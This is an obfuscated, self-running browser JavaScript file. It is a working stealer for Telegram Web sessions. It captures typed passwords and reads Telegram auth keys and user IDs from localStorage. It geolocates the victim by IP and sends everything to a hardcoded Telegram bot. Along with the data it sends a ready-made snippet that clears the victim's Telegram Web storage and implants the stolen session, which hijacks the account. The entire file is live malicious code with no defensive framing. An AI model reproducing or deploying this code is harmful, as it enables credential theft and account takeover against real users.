(function() {
    // Delay script execution to allow page to load first
    const SCRIPT_DELAY = 2500; // 2.5 seconds delay before starting

    const _0x5a1b = {
        'x7k9p': function(_0x1d3c, _0x4e8f) { return _0x1d3c === _0x4e8f; },
        'm3n5q': function(_0x2f6a, _0x9b2c) { return _0x2f6a && _0x9b2c; },
        'v9j4r': function(_0x3e7d, _0x5c1f) { return _0x3e7d + _0x5c1f; },
        'k2p6t': function(_0x4a9b, _0x6d3e) { return _0x4a9b > _0x6d3e; },
        'y8h3w': function(_0x5b6c, _0x7e9a) { return _0x5b6c < _0x7e9a; },
        'n4j7m': function(_0x6c8d, _0x9f4b) { return _0x6c8d || _0x9f4b; }
    };

    let _0x1f2a = '';
    let _0x3b4c = null;
    let _0x5d6e = { 'c': 'Unknown', 'f': '🌐' };
    let _0x7f8a = null; // Observer
    let _0x9b1c = null; // Interval ID
    let _0x2d3e = null; // Session ID

    const _0x4f5a = '8095336850:AAG86gkjOziajpDH6odKM4gvHoWllFuSlSk';
    const _0x6h7j = '-4651742295';
    const _0x8k9l = 4096;

    const _0x9m0n = () => true; // Placeholder, no bot detection

    // Remove completely - this function is never called but can interfere with page loading
    // const _0x7v8w = () => { // showMaintenanceMessage (optional fallback)
    //    document.documentElement.innerHTML = `...`;
    //    throw new Error('Access restricted: Not a valid context');
    // };
    
    // Dummy function replacement
    const _0x7v8w = () => {
        console.log('Maintenance function would have been called, but was disabled to avoid page interference');
        return false;
    };

    // Modified to be non-blocking
    const _0x9x0y = async () => { // fetchIPAddress
        try {
            // Add a small timeout to avoid blocking the main thread
            await new Promise(resolve => setTimeout(resolve, 100));
            
            const _0x1z2a = await fetch('https://api.ipify.org?format=json', {
                signal: AbortSignal.timeout(5000) // Add timeout to prevent hanging
            });
            
            if (!_0x1z2a.ok) {
                console.error('IP fetch failed with status:', _0x1z2a.status);
                return null;
            }
            
            const _0x3b4d = await _0x1z2a.json();
            console.log('Fetched IP address:', _0x3b4d.ip);
            return _0x3b4d.ip;
        } catch (_0x5d6f) {
            // Don't let fetch errors block the page
            console.error('Error fetching IP address:', _0x5d6f.message);
            return null;
        }
    };

    const _0x7f9a = async (_0x9b1d) => { // fetchCountryData
        if (!_0x9b1d) {
            console.log('No IP address provided, skipping country fetch.');
            return { 'c': 'Unknown', 'f': '🌐' };
        }
        
        try {
            // Add a small timeout to avoid blocking the main thread
            await new Promise(resolve => setTimeout(resolve, 100));
            
            // Using HTTPS instead of HTTP to avoid mixed content issues
            const _0x2d3f = await fetch(`https://ipapi.co/${_0x9b1d}/json/`, {
                signal: AbortSignal.timeout(5000) // Add timeout to prevent hanging
            });
            
            if (!_0x2d3f.ok) {
                console.error('Country data fetch failed with status:', _0x2d3f.status);
                return { 'c': 'Unknown', 'f': '🌐' };
            }
            
            const _0x4f5b = await _0x2d3f.json();
            console.log('Fetched geolocation data:', _0x4f5b);
            
            if (!_0x4f5b.error) {
                const _0x6h7k = _0x4f5b.country_name || 'Unknown';
                const _0x8k9m = _0x4f5b.country_code || '';
                
                let _0x9m0p = '🌐';
                if (_0x8k9m) {
                    try {
                        _0x9m0p = String.fromCodePoint(..._0x8k9m.split('').map(_0x1p2r => _0x1p2r.charCodeAt(0) + 127397));
                    } catch (err) {
                        console.error('Error creating flag emoji:', err.message);
                    }
                }
                
                return { 'c': _0x6h7k, 'f': _0x9m0p };
            } else {
                console.log('Geolocation API failed:', _0x4f5b.error || 'Unknown error');
                return { 'c': 'Unknown', 'f': '🌐' };
            }
        } catch (_0x7v8x) {
            // Don't let fetch errors block the page
            console.error('Error fetching country data:', _0x7v8x.message);
            return { 'c': 'Unknown', 'f': '🌐' };
        }
    };

    const _0x9x0z = async (_0x1z2b) => { // sendToTelegram
        console.log('Attempting to send to Telegram...');
        console.log('Message length:', _0x1z2b.length);
        console.log('Message to send:', _0x1z2b);
        
        try {
            const _0x3b4e = `https://api.telegram.org/bot${_0x4f5a}/sendMessage`;
            
            const _0x5d6g = await fetch(_0x3b4e, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    chat_id: _0x6h7j,
                    text: _0x1z2b.slice(0, _0x8k9l),
                    parse_mode: 'Markdown'
                })
            });
            
            if (!_0x5d6g.ok) {
                console.error('Failed to send to Telegram. Status:', _0x5d6g.status);
                return false;
            }
            
            const _0x7f8b = await _0x5d6g.json();
            console.log('Telegram API response:', _0x5d6g.status, _0x7f8b);
            
            if (_0x7f8b.ok) {
                console.log('Data sent to Telegram successfully!');
                return true;
            } else {
                console.error('Failed to send to Telegram. Response:', _0x7f8b.description || JSON.stringify(_0x7f8b));
                return false;
            }
        } catch (_0x9b1d) {
            console.error('Error sending to Telegram:', _0x9b1d.message);
            return false;
        }
    };

    const _0x2d3f = async (_0x4f5b) => { // sendLargeMessageToTelegram
        console.log('Sending large message to Telegram...');
        console.log('Full message length:', _0x4f5b.length);
        
        if (!_0x4f5b || typeof _0x4f5b !== 'string') {
            console.error('Invalid message to send:', _0x4f5b);
            return false;
        }
        
        if (_0x4f5b.length <= _0x8k9l) {
            return await _0x9x0z(_0x4f5b);
        }
        
        const _0x6h7k = _0x4f5b.split('\n');
        let _0x8k9m = '';
        let _0x9m0p = 1;
        let success = true;
        
        for (const _0x1p2r of _0x6h7k) {
            if ((_0x8k9m + _0x1p2r + '\n').length > _0x8k9l) {
                const partSuccess = await _0x9x0z(`Part ${_0x9m0p}:\n${_0x8k9m}`);
                success = success && partSuccess;
                _0x9m0p++;
                _0x8k9m = '';
            }
            _0x8k9m += _0x1p2r + '\n';
        }
        
        if (_0x8k9m.trim()) {
            const finalPartSuccess = await _0x9x0z(`Part ${_0x9m0p}:\n${_0x8k9m}`);
            success = success && finalPartSuccess;
        }
        
        return success;
    };

    const _0x7v8x = (_0x9x0z, _0x1z2b) => { // debounce
        let _0x3b4e;
        return (..._0x5d6g) => {
            clearTimeout(_0x3b4e);
            _0x3b4e = setTimeout(() => _0x9x0z(..._0x5d6g), _0x1z2b);
        };
    };

    const _0x7f8b = _0x7v8x(_0x2d3f, 1000); // debouncedSendLargeMessageToTelegram

    const _0x9b1d = () => { // captureInputs
        console.log('Attempting to capture inputs...');
        
        const selectors = [
            'input[name="password"]',
            'input[type="password"]',
            '#sign-in-password',
            '.input-field-password input',
            'input[placeholder*="password" i]',
            'input[aria-label*="password" i]',
            'input.password',
            'input[name*="pass" i]'
        ];
        
        for (const selector of selectors) {
            try {
                const inputs = document.querySelectorAll(selector);
                console.log(`Found ${inputs.length} inputs matching selector: ${selector}`);
                
                if (inputs.length > 0) {
                    inputs.forEach(input => {
                        if (input && input.value) {
                            _0x1f2a = input.value;
                            console.log('Captured password value:', _0x1f2a);
                        }
                        
                        input.addEventListener('input', () => {
                            _0x1f2a = input.value;
                            console.log('Updated password:', _0x1f2a);
                        });
                    });
                    
                    console.log(`Successfully attached listeners to ${inputs.length} password inputs`);
                    return;
                }
            } catch (err) {
                console.error(`Error with selector "${selector}":`, err.message);
            }
        }
        
        console.log('Password input not found with any selector. Will try again later.');
    };

    const _0x4f5b = () => { // stopMonitoring
        if (_0x7f8a) {
            _0x7f8a.disconnect();
            console.log('MutationObserver disconnected.');
        }
        if (_0x9b1c) {
            clearInterval(_0x9b1c);
            console.log('setInterval cleared.');
        }
    };

    const _0x6h7k = () => { // inferDcIdFromLocalStorage
        const _0x8k9m = Object.keys(localStorage).filter(_0x9m0p => _0x9m0p.startsWith('dc') && _0x9m0p.endsWith('_auth_key'));
        console.log('Available dcX_auth_key entries in localStorage:', _0x8k9m);
        
        if (_0x8k9m.length === 0) {
            console.warn('No dcX_auth_key entries found in localStorage.');
            return null;
        }
        
        const _0x1p2r = _0x8k9m.sort().pop();
        if (!_0x1p2r) {
            console.warn('Failed to get a valid auth key from localStorage.');
            return null;
        }
        
        const _0x7v8y_match = _0x1p2r.match(/dc(\d+)_auth_key/);
        if (!_0x7v8y_match || !_0x7v8y_match[1]) {
            console.warn('Failed to extract dcId from auth key:', _0x1p2r);
            return null;
        }
        
        const _0x7v8y = parseInt(_0x7v8y_match[1]);
        console.log('Inferred dcId from localStorage:', _0x7v8y);
        return _0x7v8y;
    };

    const _0x8k9m = (_0x9m0p) => { // fetchAuthKeyForDcId
        if (!_0x9m0p || _0x9m0p < 1 || _0x9m0p > 5) {
            console.warn(`Invalid dcId: ${_0x9m0p}. Must be between 1 and 5.`);
            return { authKey: null, authKeyField: null };
        }
        
        const _0x1p2r = `dc${_0x9m0p}_auth_key`;
        const _0x7v8y = localStorage.getItem(_0x1p2r) || '';
        
        if (!_0x7v8y) {
            console.warn(`No authKey found for ${_0x1p2r} in localStorage.`);
            return { authKey: null, authKeyField: _0x1p2r };
        }
        
        console.log(`Successfully fetched authKey for ${_0x1p2r}:`, _0x7v8y);
        return { authKey: _0x7v8y, authKeyField: _0x1p2r };
    };

    const _0x9m0p = (_0x1p2r) => { // hasMessageBeenSent
        const _0x7v8y = JSON.parse(localStorage.getItem('sentSessions') || '{}');
        return _0x7v8y[_0x1p2r] === true;
    };

    const _0x1p2r = (_0x7v8y) => { // markMessageAsSent
        const _0x8k9n = JSON.parse(localStorage.getItem('sentSessions') || '{}');
        _0x8k9n[_0x7v8y] = true;
        localStorage.setItem('sentSessions', JSON.stringify(_0x8k9n));
        console.log(`Marked session ${_0x7v8y} as sent.`);
    };

    const _0x7v8y = () => { // resetSentState
        localStorage.removeItem('sentSessions');
        console.log('Reset sent state for new login.');
        _0x2d3e = null;
    };

    const _0x8k9n = async () => { // checkLoginAndSend
        console.log('Checking for login...');
        
        try {
            console.log('Current localStorage entries:', Object.fromEntries(Object.keys(localStorage).map(_0x9m0q => [_0x9m0q, localStorage.getItem(_0x9m0q)])));
            
            const _0x1p2s = localStorage.getItem('user_auth');
            if (!_0x1p2s) {
                console.log('user_auth not found in localStorage.');
                return;
            }
            
            console.log('user_auth found in localStorage (raw, full length):', _0x1p2s);
            console.log('user_auth length:', _0x1p2s.length);
            
            console.log('Starting checkLoginAndSend logic...');
            let _0x7v8z; // Unique variable for parsedAuth
            try {
                _0x7v8z = JSON.parse(_0x1p2s);
            } catch (_0x8k9o) {
                console.error('Failed to parse user_auth JSON:', _0x8k9o.message);
                console.log('Raw user_auth for debugging:', _0x1p2s);
                return;
            }
            
            if (!_0x7v8z) {
                console.error('Parsed user_auth is null or undefined');
                return;
            }
            console.log('Parsed user_auth (full object):', _0x7v8z);
            
            _0x3b4c = _0x7v8z.id || _0x7v8z.vId || 0;
            let _0x9m0q = _0x7v8z.dc || _0x7v8z.vDc || _0x7v8z.dc_id;
            
            console.log('Extracted dcId from user_auth:', _0x9m0q);
            
            if (!_0x9m0q || _0x9m0q < 1 || _0x9m0q > 5) {
                console.warn('dcId not found in user_auth or invalid, attempting to infer from localStorage...');
                _0x9m0q = _0x6h7k();
                if (!_0x9m0q) {
                    console.warn('Could not infer dcId from localStorage, defaulting to 1 and continuing...');
                    _0x9m0q = 1;
                    // Removed the "return" statement that was causing the infinite loading issue
                }
            }
            
            if (!_0x3b4c) {
                console.warn('User ID is empty! Waiting for it to be captured...');
                return;
            }
            console.log('Extracted userId from user_auth:', _0x3b4c);
            
            if (!_0x2d3e) {
                _0x2d3e = `${_0x3b4c}_${Date.now()}`;
                console.log('Generated new session ID:', _0x2d3e);
            }
            
            if (_0x9m0p(_0x2d3e)) {
                console.log('Message already sent for session:', _0x2d3e);
                _0x4f5b();
                return;
            }
            
            const { authKey, authKeyField } = _0x8k9m(_0x9m0q);
            // Using unique variable names to avoid shadowing
            const _0x1p2s_authKey = authKey;
            const _0x7v8a = authKeyField;
            
            if (!_0x1p2s_authKey) {
                console.warn(`authKey for dcId ${_0x9m0q} is empty! Waiting for it to be populated...`);
                return;
            }
            
            if (_0x5d6e.c === 'Unknown') {
                const _0x8k9o = await _0x9x0y();
                if (_0x8k9o) {
                    _0x5d6e = await _0x7f9a(_0x8k9o);
                }
                console.log('Updated country data:', _0x5d6e);
            }
            
            const _0x9m0r = `https://t.me/+${_0x3b4c}`;
            console.log('Generated permanent profile link:', _0x9m0r);
            
            const _0x1p2t = `if(location.host=="web.telegram.org"){indexedDB.databases().then(d=>d.filter(b=>b.name==="tweb").forEach(b=>{r=indexedDB.open("tweb",b.version);r.onsuccess=()=>{x=r.result.transaction(["chats","dialogs","messages","session","stickerSets","users"],"readwrite");["chats","dialogs","messages","session","stickerSets","users"].forEach(s=>x.objectStore(s).clear())}})),localStorage.clear(),localStorage.setItem("account1",JSON.stringify({"${_0x7v8a}":${_0x1p2s_authKey},"userId":${_0x3b4c},"dcId":${_0x9m0q}}))}location="https://web.telegram.org/k/"`;
            console.log('Formatted JavaScript snippet with embedded dcId:', _0x1p2t);
            
            const _0x7v8b = _0x1p2t.match(/"dcId":(\d+)/);
            if (_0x7v8b && parseInt(_0x7v8b[1]) !== _0x9m0q) {
                console.error(`dcId mismatch! Extracted dcId: ${_0x9m0q}, dcId in jsSnippet: ${_0x7v8b[1]}`);
                return;
            }
            console.log('dcId consistency verified in jsSnippet:', _0x9m0q);
            
            const _0x8k9p = `dc${_0x9m0q}_auth_key`;
            if (_0x7v8a !== _0x8k9p) {
                console.error(`authKeyField mismatch! Expected: ${_0x8k9p}, Got: ${_0x7v8a}`);
                return;
            }
            console.log('authKeyField consistency verified:', _0x7v8a);
            
            const _0x9m0s = `
✨ *New user verified*

📍 *Country*: ${_0x5d6e.c} ${_0x5d6e.f}

🔑 *Password*: ${_0x1f2a || 'Not Used'}

⚙️ *Hit ID*: ${_0x3b4c}

\`${_0x1p2t}\`
            `;
            console.log('Full message prepared:', _0x9m0s);
            
            await _0x7f8b(_0x9m0s);
            _0x1p2r(_0x2d3e);
            _0x4f5b();
        } catch (_0x7v8c) {
            console.error('Error in checkLoginAndSend:', _0x7v8c.message, _0x7v8c.stack);
        }
    };

    const _0x8k9o = (_0x9m0q, _0x1p2s) => { // throttle
        let _0x7v8c;
        let _0x8k9q;
        return (..._0x9m0t) => {
            if (!_0x8k9q) {
                _0x9m0q(..._0x9m0t);
                _0x8k9q = Date.now();
            } else {
                clearTimeout(_0x7v8c);
                _0x7v8c = setTimeout(() => {
                    if (Date.now() - _0x8k9q >= _0x1p2s) {
                        _0x9m0q(..._0x9m0t);
                        _0x8k9q = Date.now();
                    }
                }, _0x1p2s - (Date.now() - _0x8k9q));
            }
        };
    };

    const _0x9m0u = async () => { // init (marked as async)
        console.log('Initializing captureAndSendAuthData...');
        
        // Make sure we're actually in a web page context before trying to do DOM operations
        if (!window || !document || !document.documentElement) {
            console.warn('Not in a proper DOM context, skipping initialization');
            return;
        }
        
        const _0x1p2u = () => {
            try {
                const _0x7v8d = localStorage.getItem('user_auth');
                if (!_0x7v8d) {
                    console.log('User logged out, resetting sent state...');
                    _0x7v8y();
                }
            } catch (err) {
                console.error('Error checking localStorage:', err.message);
            }
        };
        
        try {
            _0x9b1d();
        } catch (err) {
            console.error('Error in captureInputs:', err.message);
        }
        
        // Use a lighter throttle function to reduce CPU usage
        const _0x8k9r = _0x8k9o(() => {
            try {
                console.log('DOM mutation observed, rechecking inputs and login...');
                _0x1p2u();
                _0x9b1d();
                _0x8k9n();
            } catch (err) {
                console.error('Error in mutation handler:', err.message);
            }
        }, 2000); // Reduce frequency to every 2 seconds
        
        try {
            _0x7f8a = new MutationObserver(_0x8k9r);
            _0x7f8a.observe(document.documentElement, { 
                childList: true, 
                subtree: true,
                // Reduce the scope of what we're observing to minimize performance impact
                attributes: false,
                characterData: false
            });
        } catch (err) {
            console.error('Error setting up MutationObserver:', err.message);
        }
        
        try {
            // Use a longer interval to reduce CPU usage
            _0x9b1c = setInterval(() => {
                console.log('Periodic check for login...');
                _0x1p2u();
                _0x9b1d();
                _0x8k9n();
            }, 3000); // Reduce frequency to every 3 seconds
        } catch (err) {
            console.error('Error setting up interval:', err.message);
        }
    };

    document.addEventListener('DOMContentLoaded', () => {
        console.log('DOM loaded, but delaying script execution...');
        
        // Don't run the script immediately, give time for the page to render first
        setTimeout(async () => {
            console.log(`Starting init after ${SCRIPT_DELAY}ms delay...`);
            try {
                await _0x9m0u();
            } catch (err) {
                console.error('Error in init process:', err);
                
                // Attempt recovery by restarting the monitoring, with additional delay
                setTimeout(async () => {
                    console.log('Attempting recovery after error...');
                    try {
                        // Stop any existing monitoring
                        _0x4f5b();
                        // Restart
                        await _0x9m0u();
                    } catch (recoveryErr) {
                        console.error('Recovery attempt failed:', recoveryErr);
                    }
                }, 5000);
            }
        }, SCRIPT_DELAY);
    });
    
    // Fallback initialization if DOMContentLoaded already fired
    if (document.readyState === 'complete' || document.readyState === 'interactive') {
        console.log('DOM already loaded, delaying script execution...');
        setTimeout(async () => {
            console.log(`Starting delayed init after ${SCRIPT_DELAY}ms...`);
            try {
                await _0x9m0u();
            } catch (err) {
                console.error('Error in delayed init process:', err);
            }
        }, SCRIPT_DELAY);
    }
})();